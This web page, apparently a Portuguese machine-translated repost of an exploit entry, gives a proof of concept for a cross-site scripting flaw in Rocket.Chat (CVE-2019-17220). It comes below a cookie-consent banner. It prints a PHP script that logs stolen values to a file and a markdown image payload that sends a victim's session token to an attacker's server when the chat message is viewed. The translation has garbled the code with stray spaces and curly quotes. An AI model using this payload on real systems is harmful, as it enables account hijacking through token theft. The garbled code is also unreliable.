Personalizar Preferências de Consentimento

Utilizamos cookies para ajudá-lo a navegar com eficiência e executar determinadas funções. Você encontrará informações detalhadas sobre todos os cookies em cada categoria de consentimento abaixo.

Os cookies categorizados como "Necessários" são armazenados em seu navegador, pois são essenciais para ativar as funcionalidades básicas do site.... 

Sempre Ativo

Os cookies necessários são essenciais para ativar as funcionalidades básicas deste site, como fornecer login seguro ou ajustar suas preferências de consentimento. Esses cookies não armazenam dados pessoalmente identificáveis.

Nenhum cookie para exibir.

Os cookies funcionais ajudam a executar determinadas funcionalidades, como compartilhar o conteúdo do site em plataformas de mídia social, coletar feedback e outras funcionalidades de terceiros.

Nenhum cookie para exibir.

Os cookies analíticos são usados para entender como os visitantes interagem com o site. Esses cookies ajudam a fornecer informações sobre métricas, como o número de visitantes, taxa de rejeição, fonte de tráfego, entre outros.

Nenhum cookie para exibir.

Os cookies de desempenho são usados para entender e analisar os principais índices de desempenho do site, o que ajuda a oferecer uma melhor experiência de usuário para os visitantes.

Nenhum cookie para exibir.

Os cookies de publicidade são usados para fornecer aos visitantes anúncios personalizados com base nas páginas que você visitou anteriormente e para analisar a eficácia das campanhas publicitárias.

Nenhum cookie para exibir.

Rocket.Chat 2.1.0 – Cross-Site Scripting

Rocket.Chat 2.1.0 – Cross-Site Scripting

# Title: Rocket.Chat 2.1.0 – Script entre sites
# Autor: 3H34N
# Data: 2019-10-22
# Produto: Rocket.Chat
# Fornecedor: https://rocket.chat/
# Versões vulneráveis: Rocket.Chat <2.1.0
# CVE: CVE-2019-17220
# Agradecimentos especiais: Ali razmjoo, Mohammad Reza Espargham (@rezesp)

# PoC
# 1. Crie l33t.php em um servidor web

<? php
$ output = fopen (“logs.txt”, “a +”) ou die (“WTF? o.O”);
$ leet = $ _GET [‘leet’]. “\ n \ n”;
fwrite ($ output, $ leet);
fclose ($ output);
?>

# 2. Abra uma sessão de bate-papo
# 3. Envie carga útil com o URL do servidor da web

! [title] (http: //10.10.1.5/l33t.php? leet = + `{} token`)

# 4. O token será gravado em logs.txt quando o destino visualizar sua mensagem.

Compartilhe esse post

Posts populares